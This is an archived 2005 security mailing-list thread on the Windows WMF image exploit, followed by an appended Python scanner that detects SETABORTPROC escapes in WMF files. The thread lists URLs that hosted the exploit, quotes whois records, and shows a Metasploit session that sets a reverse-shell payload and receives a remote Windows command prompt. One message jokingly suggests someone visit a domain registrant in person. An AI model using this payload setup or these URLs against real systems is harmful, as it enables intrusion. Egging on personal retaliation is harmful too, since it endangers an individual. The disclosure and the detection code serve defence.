Message-ID: <43B31157.7020909@heapoverflow.com>
Date: Wed Dec 28 22:28:00 2005
From: ad at heapoverflow.com (ad@...poverflow.com)
Subject: Someone wasted a nice bug on spyware...

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
 
I think you shouldn't be a security specialist for putting crackz.ws in
your banned website list, hehehe, this is probably the funniest
warez site around there and I bet these losers don't know the
number of IE exploits they are hosting on their own domain lol...

Paul wrote:
> Indeed, this is quite an annoyance. Buytoolbar.biz/xpl.wmf also works. I
> sent it to Microsoft a few days ago and they're looking into it. It looks
> like it's going to be a bad week at MSRC :(
>
> I whoised the owners of a couple domains who host the image and got the
> following information:
>
> Domain Name:                                 BEEHAPPYY.BIZ
> Domain ID:                                   D9564716-BIZ
> Sponsoring Registrar:                        ONLINENIC, INC. D/B/A CHINA-CHANNEL.COM
> Sponsoring Registrar IANA ID:                82
> Domain Status:                               ok
> Registrant ID:                               OLNIC_919328_0_0
> Registrant Name:                             Mikhail Sergeevich Gorbachev
> Registrant Organization:                     Mikhail Sergeevich Gorbachev
> Registrant Address1:                         Krasnaya ploshad, 1
> Registrant City:                             Moscow
> Registrant State/Province:                   Moscow
> Registrant Postal Code:                      176098
> Registrant Country:                          Russian Federation
> Registrant Country Code:                     RU
> Registrant Phone Number:                     +7.0957643453
> Registrant Facsimile Number:                 +7.0957643453
> Registrant Email:                            mail@...lbox.temp
> Administrative Contact ID:                   OLNIC_919328_1_0
> Administrative Contact Name:                 Mikhail Sergeevich Gorbachev
> Administrative Contact Organization:         Mikhail Sergeevich Gorbachev
> Administrative Contact Address1:             Krasnaya ploshad, 1
> Administrative Contact City:                 Moscow
> Administrative Contact State/Province:       Moscow
> Administrative Contact Postal Code:          176098
> Administrative Contact Country:              Russian Federation
> Administrative Contact Country Code:         RU
> Administrative Contact Phone Number:         +7.0957643453
> Administrative Contact Facsimile Number:     +7.0957643453
> Administrative Contact Email:                mail@...lbox.temp
> Billing Contact ID:                          OLNIC_919328_3_0
> Billing Contact Name:                        Mikhail Sergeevich Gorbachev
> Billing Contact Organization:                Mikhail Sergeevich Gorbachev
> Billing Contact Address1:                    Krasnaya ploshad, 1
> Billing Contact City:                        Moscow
> Billing Contact State/Province:              Moscow
> Billing Contact Postal Code:                 176098
> Billing Contact Country:                     Russian Federation
> Billing Contact Country Code:                RU
> Billing Contact Phone Number:                +7.0957643453
> Billing Contact Facsimile Number:            +7.0957643453
> Billing Contact Email:                       mail@...lbox.temp
> Technical Contact ID:                        OLNIC_919328_2_0
> Technical Contact Name:                      Mikhail Sergeevich Gorbachev
> Technical Contact Organization:              Mikhail Sergeevich Gorbachev
> Technical Contact Address1:                  Krasnaya ploshad, 1
> Technical Contact City:                      Moscow
> Technical Contact State/Province:            Moscow
> Technical Contact Postal Code:               176098
> Technical Contact Country:                   Russian Federation
> Technical Contact Country Code:              RU
> Technical Contact Phone Number:              +7.0957643453
> Technical Contact Facsimile Number:          +7.0957643453
> Technical Contact Email:                     mail@...lbox.temp
> Name Server:                                 NS1.PERLINK.BIZ
> Name Server:                                 NS2.PERLINK.BIZ
> Created by Registrar:                        ONLINENIC, INC. D/B/A CHINA-CHANNEL.COM
> Last Updated by Registrar:                   ONLINENIC, INC. D/B/A CHINA-CHANNEL.COM
> Domain Registration Date:                    Tue Apr 26 15:43:16 GMT 2005
> Domain Expiration Date:                      Wed Apr 25 23:59:59 GMT 2007
> Domain Last Updated Date:                    Thu Aug 11 02:33:14 GMT 2005
>
>
> The name Mikhail Sergeevich Gorbachev that this domain is registered to
> leads me to believe that it is registered with false information (for those
> of you who don't know, Gorbachev was a former Soviet president).
>
>
> Domain Name:                                 BUYTOOLBAR.BIZ
> Domain ID:                                   D11475548-BIZ
> Sponsoring Registrar:                        TLDS INC.
> Sponsoring Registrar IANA ID:                320
> Domain Status:                               clientTransferProhibited
> Registrant ID:                               6464084-SRSPLUS
> Registrant Name:                             Ezhi Brozkevitsh
> Registrant Organization:                     Ezhi Brozkevitsh
> Registrant Address1:                         Al. Armii Ludowej 24
> Registrant City:                             Warszawa
> Registrant Postal Code:                      00-609
> Registrant Country:                          Poland
> Registrant Country Code:                     PL
> Registrant Phone Number:                     +21.225798400
> Registrant Email:                            admin@...traff.biz
> Administrative Contact ID:                   6464085-SRSPLUS
> Administrative Contact Name:                 Ezhi Brozkevitsh
> Administrative Contact Organization:         Ezhi Brozkevitsh
> Administrative Contact Address1:             Al. Armii Ludowej 24
> Administrative Contact City:                 Warszawa
> Administrative Contact Postal Code:          00-609
> Administrative Contact Country:              Poland
> Administrative Contact Country Code:         PL
> Administrative Contact Phone Number:         +21.225798400
> Administrative Contact Email:                admin@...traff.biz
> Billing Contact ID:                          6464085-SRSPLUS
> Billing Contact Name:                        Ezhi Brozkevitsh
> Billing Contact Organization:                Ezhi Brozkevitsh
> Billing Contact Address1:                    Al. Armii Ludowej 24
> Billing Contact City:                        Warszawa
> Billing Contact Postal Code:                 00-609
> Billing Contact Country:                     Poland
> Billing Contact Country Code:                PL
> Billing Contact Phone Number:                +21.225798400
> Billing Contact Email:                       admin@...traff.biz
> Technical Contact ID:                        6464086-SRSPLUS
> Technical Contact Name:                      Ezhi Brozkevitsh
> Technical Contact Organization:              Ezhi Brozkevitsh
> Technical Contact Address1:                  Al. Armii Ludowej 24
> Technical Contact City:                      Warszawa
> Technical Contact Postal Code:               00-609
> Technical Contact Country:                   Poland
> Technical Contact Country Code:              PL
> Technical Contact Phone Number:              +21.225798400
> Technical Contact Email:                     admin@...traff.biz
> Name Server:                                 NS1.BUYTOOLBAR.BIZ
> Name Server:                                 NS2.BUYTOOLBAR.BIZ
> Created by Registrar:                        TLDS INC.
> Last Updated by Registrar:                   TLDS INC.
> Domain Registration Date:                    Mon Nov 14 08:00:27 GMT 2005
> Domain Expiration Date:                      Mon Nov 13 23:59:59 GMT 2006
> Domain Last Updated Date:                    Mon Nov 14 11:16:52 GMT 2005
>
> This information does look promising. Iframeurl.biz is also registered to
> the same individual. Perhaps the Polish authorities could apprehend this
> culprit (either that, or a Polish reader of full-disclosure could pay him a
> visit ;). That is, of course, assuming he is stupid enough to use his real
> name to register a domain for illegal use.
>
>
> Regards,
> Paul
> Greyhats Security
> http://greyhatsecurity.org
>
>
>
>
> -----Original Message-----
> From: full-disclosure-bounces@...ts.grok.org.uk
> [mailto:full-disclosure-bounces@...ts.grok.org.uk] On Behalf Of Eric Sites
> Sent: Tuesday, December 27, 2005 11:02 PM
> To: full-disclosure@...ts.grok.org.uk
> Subject: RE: [Full-disclosure] Someone wasted a nice bug on spyware...
>
> We are seeing a lot of website picking this exploit up.
>
> Examples: DON'T CLICK
>
> Crackz.ws
> unionseek.com/d/t1/wmf_exp.htm
> beehappyy.biz/parthner3/xpl.wmf
> http://www.tfcco.com/xpl.wmf
> Iframeurl.biz
>
> Cheers,
>
> Eric Sites
> VP of Research & Development
> Sunbelt Software
>
> email: eric@...belt-software.com
> Voice: 1-727-562-0101 x 276
> Cell: 1-727-637-2414
> Fax: 1-727-562-5199
> Web: http://www.sunbelt-software.com
> Physical Address:
> 101 N Garden Ave,
> Suite 120
> Clearwater, FL, 33755
> United States
>
> -----Original Message-----
> From: full-disclosure-bounces@...ts.grok.org.uk
> [mailto:full-disclosure-bounces@...ts.grok.org.uk] On Behalf Of H D
> Moore
> Sent: Tuesday, December 27, 2005 10:57 PM
> To: full-disclosure@...ts.grok.org.uk
> Subject: [Full-disclosure] Someone wasted a nice bug on spyware...
>
> In reference to:
> http://www.securityfocus.com/archive/1/420288/30/0/threaded
>
> I ported the exploit to the Metasploit Framework in case anyone wants to
> test it without installing a thousand spyware apps...
>
> Available from 'msfupdate' for MSF users, or in the 2.5 snapshot:
>
> --http://metasploit.com/projects/Framework/exploits.html#ie_xp_pfv_metafile
> --http://metasploit.com/tools/framework-2.5-snapshot.tar.gz
>
> Tested on Win XP SP1/SP2 and Windows 2003 SP0/SP1.
>
> -HD
>
> + -- --=[ msfconsole v2.5 [147 exploits - 77 payloads]
>
> msf > use ie_xp_pfv_metafile
> msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse
> PAYLOAD -> win32_reverse
> msf ie_xp_pfv_metafile(win32_reverse) > set LHOST 192.168.0.2
> LHOST -> 192.168.0.2
> msf ie_xp_pfv_metafile(win32_reverse) > exploit
>
> [*] Starting Reverse Handler.
> [*] Waiting for connections to http://0.0.0.0:8080/anything.wmf
> [*] HTTP Client connected from 192.168.0.219:1060 using Windows XP
> [*] Got connection from 192.168.0.2:4321 <-> 192.168.0.219:1061
>
> Microsoft Windows XP [Version 5.1.2600]
> (C) Copyright 1985-2001 Microsoft Corp.
>
> C:\Documents and Settings\XXXX\Desktop> 
>
>
> On Tuesday 27 December 2005 14:20, noemailpls@...mail.ziper wrote:
>> Warning the following URL successfully exploited a fully patched
>> windows xp system with a freshly updated norton anti virus.
>>
>> unionseek.com/d/t1/wmf_exp.htm
>>
>> The url runs a .wmf and executes the virus, f-secure will pick up the
>> virus norton will not.
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (MingW32)
-----END PGP SIGNATURE-----
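The thread above concerns an exploit delivered as a .wmf image: HD Moore's module serves it over HTTP (the /anything.wmf URL in his session) and Eric Sites lists spyware domains hosting copies of it. As an added example, written here and not part of the original thread or of the Metasploit Framework, the Python checker below takes the defender's side: it walks the WMF record stream and reports a META_ESCAPE record whose escape function is SETABORTPROC (the escape that Microsoft's GDI fix of early January 2006 addressed), plus structural anomalies such as a record that overruns the file or a missing META_EOF. Record layouts and constants are taken from the public WMF format; the two sample files are constructed in the block, carry no payload, and exist only to exercise the parser.

```python
import struct
import sys

# Public WMF format constants (not from the thread; see the MS-WMF specification).
PLACEABLE_KEY = 0x9AC6CDD7      # optional 22-byte Aldus placeable header
META_EOF = 0x0000
META_ESCAPE = 0x0626
META_SETMAPMODE = 0x0103
ESCAPE_SETABORTPROC = 0x0009


def parse_wmf(data: bytes) -> list:
    """Walk a WMF file and return a list of findings. An empty list means the
    record stream is well formed and contains no SETABORTPROC escape."""
    findings = []
    off = 0
    if len(data) >= 22 and struct.unpack_from("<I", data, 0)[0] == PLACEABLE_KEY:
        off = 22                                  # skip the placeable header
    if len(data) < off + 18:
        return ["truncated: no METAHEADER"]
    # METAHEADER: Type, HeaderSize(words), Version, SizeLow, SizeHigh,
    # NumberOfObjects, MaxRecord(words), NumberOfMembers
    _, hdr_words, _, _, _, _, _, _ = struct.unpack_from("<HHHHHHIH", data, off)
    if hdr_words != 9:
        findings.append(f"unexpected METAHEADER size {hdr_words} words")
    off += 18
    saw_eof = False
    while off + 6 <= len(data):
        rec_words, func = struct.unpack_from("<IH", data, off)   # Size, Function
        rec_len = rec_words * 2
        if rec_words < 3 or off + rec_len > len(data):
            findings.append(f"malformed record at offset {off}: size {rec_words} words")
            break
        if func == META_EOF:
            saw_eof = True
            break
        if func == META_ESCAPE:
            if rec_len >= 10:
                esc_func, byte_count = struct.unpack_from("<HH", data, off + 6)
                if esc_func == ESCAPE_SETABORTPROC:
                    findings.append(
                        f"META_ESCAPE SETABORTPROC at offset {off} "
                        f"({byte_count} bytes of escape data)")
            else:
                findings.append(f"short META_ESCAPE record at offset {off}")
        off += rec_len
    if not saw_eof:
        findings.append("no META_EOF record")
    return findings


def _record(func: int, params: bytes) -> bytes:
    """Encode one WMF record: Size in words (DWORD), Function (WORD), params."""
    if len(params) % 2:
        params += b"\x00"
    return struct.pack("<IH", (6 + len(params)) // 2, func) + params


def build_wmf(records: list) -> bytes:
    """Assemble a minimal disk metafile from records, appending META_EOF."""
    all_records = list(records) + [_record(META_EOF, b"")]
    body = b"".join(all_records)
    total_words = (18 + len(body)) // 2
    max_rec = max(len(r) // 2 for r in all_records)
    header = struct.pack("<HHHHHHIH", 1, 9, 0x0300,
                         total_words & 0xFFFF, total_words >> 16, 0, max_rec, 0)
    return header + body


# Constructed samples (test vectors only; no executable content).
BENIGN_WMF = build_wmf([_record(META_SETMAPMODE, struct.pack("<H", 8))])
SUSPECT_WMF = build_wmf([_record(META_ESCAPE,
                                 struct.pack("<HH", ESCAPE_SETABORTPROC, 4) + b"\x00" * 4)])
PLACEABLE_HEADER = struct.pack("<IHhhhhHIH", PLACEABLE_KEY, 0, 0, 0, 0, 0, 96, 0, 0)


def scan_file(path: str) -> list:
    """Convenience wrapper: parse a file on disk and return its findings."""
    with open(path, "rb") as fh:
        return parse_wmf(fh.read())


if __name__ == "__main__":
    for p in sys.argv[1:]:
        for line in scan_file(p) or ["clean"]:
            print(f"{p}: {line}")
```

Run it over a directory of image files pulled from a proxy cache or mail quarantine; a hit on the SETABORTPROC escape in a plain picture file is a strong indicator, since ordinary images have no reason to carry a printer-abort-procedure escape.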

